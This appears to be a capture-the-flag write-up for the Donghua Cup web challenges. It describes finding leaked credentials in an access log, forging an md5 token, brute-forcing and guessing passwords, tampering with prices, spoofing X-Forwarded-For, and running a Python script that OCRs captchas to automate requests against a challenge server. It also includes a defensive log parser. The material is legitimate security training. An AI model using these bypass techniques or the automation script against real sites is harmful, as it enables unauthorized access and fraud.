Donghua Cup
Web1 Careful
Scanned the directories with dirsearch and found /log/access.log.
Downloaded it with curl:
172.16.3.1 - - [12/Oct/2016:07:54:48 +0000] "GET /wojiushiHouTai888/denglU.php?username=admin&password=af3a-6b2115c9a2c0&submit=%E7%99%BB%E5%BD%95 HTTP/1.1" 200 771 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
Visiting that URL directly gives the flag:
flag{ff11025b-ed80-4c42-afc1-29b4c41010cb}
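As an added defensive example (not part of the original writeup), here is a small parser for combined-format access logs that flags any request carrying a credential in its query string, which is exactly how the login above ended up readable in /log/access.log. The log lines in the block are constructed, modelled on the line above with the password value replaced.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" access log format, one request per line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Parameter names that must never travel in a URL: they land in access logs,
# browser history, proxy logs and Referer headers.
SENSITIVE_PARAMS = {"password", "passwd", "pwd", "token", "secret", "api_key"}


def parse_line(line):
    """Return the log record as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    split = urlsplit(rec["target"])
    rec["path"] = split.path
    rec["query"] = parse_qs(split.query)  # percent-decoded, e.g. the submit value
    return rec


def find_credential_leaks(lines):
    """List every request whose query string carries a sensitive parameter."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        leaked = sorted(k for k in rec["query"] if k.lower() in SENSITIVE_PARAMS)
        if leaked:
            findings.append({"ip": rec["ip"], "method": rec["method"],
                             "path": rec["path"], "status": rec["status"],
                             "params": leaked})
    return findings


# Constructed sample log, modelled on the line in the writeup (secret value replaced).
SAMPLE_LOG = [
    '172.16.3.1 - - [12/Oct/2016:07:54:48 +0000] "GET /wojiushiHouTai888/denglU.php'
    '?username=admin&password=REDACTED-EXAMPLE&submit=%E7%99%BB%E5%BD%95 HTTP/1.1" 200 771 "-" "Mozilla/5.0"',
    '172.16.3.1 - - [12/Oct/2016:07:55:02 +0000] "POST /wojiushiHouTai888/denglU.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '172.16.3.5 - - [12/Oct/2016:07:56:10 +0000] "GET /index.php?page=home HTTP/1.1" 200 1024 "-" "curl/7.47"',
]
```

Running `find_credential_leaks(SAMPLE_LOG)` reports only the first line; the fix on the application side is to accept login credentials via POST bodies only and to never log query strings verbatim.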
Web2 Jump
Broken access control
When logging in with the test/test account, a token can be seen: the md5 of test2.
Requesting admin.php with that md5 gives the flag.
Web Threat 1
admin
Brute-forced the password: 20160807
Web Threat 2
Inspecting the session reveals a guest user.
Tried the password 123456, logged in and, inexplicably, got the flag.
Web Great Value
Modify the response packet, changing every price to 0.001, so that the POST request can still be sent.
Change the POST data to id=0.01&Price=0.01
and the flag pops up.
Web Grab Coins
Wrote a script to grab coins, but robbing gets you caught.
After a long pause, found that using result2 = s2.head(url2,data=payload, headers=header).content in the last step instead of post does not get caught.
Script as follows:
#!/usr/bin/python
# -*- coding:utf-8 -*-
'''
image = Image.open('vcode.png')
vcode = pytesseract.image_to_string(image)
print vcode
'''
import re
try:
    import requests
except ImportError:
    raise SystemExit('\n[!] requests模块导入错误,请执行pip install requests安装!')
try:
    import pytesseract
    from PIL import Image
except ImportError:
    print '模块导入错误,请使用pip安装,pytesseract依赖以下库:'
    print 'http://www.lfd.uci.edu/~gohlke/pythonlibs/#pil'
    print 'http://code.google.com/p/tesseract-ocr/'
    raise SystemExit
try:
    while 1:
        s = requests.Session()
        url1 = 'http://120.132.85.112:8888/rob.php'
        url2 = 'http://120.132.85.112:8888/dorob.php'
        captchaUrl = 'http://120.132.85.112:8888/code.php'
        # hidden form field that carries the target user name
        pattern = re.compile(r'<input type="hidden" name="user" value=".*">')
        for userId in [4, 2, 3, 48, 1, 49, 58, 97, 98, 38, 36, 28, 114, 20, 72, 77, 20, 66, 63, 104, 31, 104, 70, 39]:
            #print userId
            header = {'Cookie': 'PHPSESSID=fmdsad90jg0ss8aor5ef29blh7'}
            result1 = s.get(url1, params={'id': str(userId)}, headers=header).content
            matchResult = pattern.search(result1)
            if matchResult:
                # fetch the captcha image and OCR it with tesseract
                captchaImage = s.get(captchaUrl, headers=header).content
                with open('captcha.png', 'wb') as f:
                    f.write(captchaImage)
                imageFile = Image.open('captcha.png')
                #print imageFile
                code = pytesseract.image_to_string(imageFile, lang="eng")
                #print code
                # value="..." is the 6th quote-delimited chunk of the matched tag
                userName = matchResult.group().split('"')[5]
                payload = {'user': userName, 'num': '1', 'code': code}
                s2 = requests.Session()
                result2 = s2.post(url2, data=payload, headers=header).content
                print result2
                '''
                r = s.post(url1, data=payload, headers=header)
                if 'error' not in r.content:
                    print '\n爷,正确密码为:', pwd
                    print '\n' + r.content
                    break
                else:
                    print '正在尝试密码:', pwd
                '''
except KeyboardInterrupt:
    raise SystemExit('大爷,按您的吩咐,已成功退出!')
Web Analysis
http://120.132.85.112:1999/administrator.php is reachable as the management page. The default account and password, administrator / administrator, can be found in the page's front-end source. Logging in returns a message that the IP is not in the allowed range; forging X-Forwarded-For as 127.0.0.1 gets the flag.